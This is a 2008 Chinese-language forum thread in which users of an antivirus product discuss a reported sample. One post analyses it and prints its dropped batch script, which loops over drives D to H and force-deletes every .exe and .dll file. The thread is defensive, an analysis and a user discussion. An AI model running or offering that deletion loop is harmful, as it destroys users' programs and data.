[ Last edited by Legend on 2008-8-22 at 11:29 ]作者: Legend 时间: 2008-8-22 11:28 感谢楼主的反馈,我们会及时分析测试的。作者: yinjin 时间: 2008-8-22 12:01 用微点机子好快,真的感觉像裸奔,比用了几年的nod32还厉害。希望能发展更完美作者: lotei 时间: 2008-8-22 12:51 该样本是bat转化为exe文件,执行之后释放随机名的bat在TEMP目录下,
bat的内容为:
@shift
@echo off
for %%i in ( d e f g h) do (
cd /d %%i:
del /f/s/f/q *.exe && del /f/s/f/q *.dll
)
删除非系统盘以外的任意exe以及dll文件,属于恶意程序或者是玩笑程序。鄙视一下作者的无聊!作者: yinjin 时间: 2008-8-22 20:38 删除非系统盘以外的任意exe以及dll文件.那不是危害很大?我的绿软都在d盘呀。另外微点没有防住吗?算不算病毒?作者: tustin 时间: 2008-8-22 21:49
Quote:
Originally posted by yinjin at 2008-8-22 20:38:
删除非系统盘以外的任意exe以及dll文件.那不是危害很大?我的绿软都在d盘呀。另外微点没有防住吗?算不算病毒?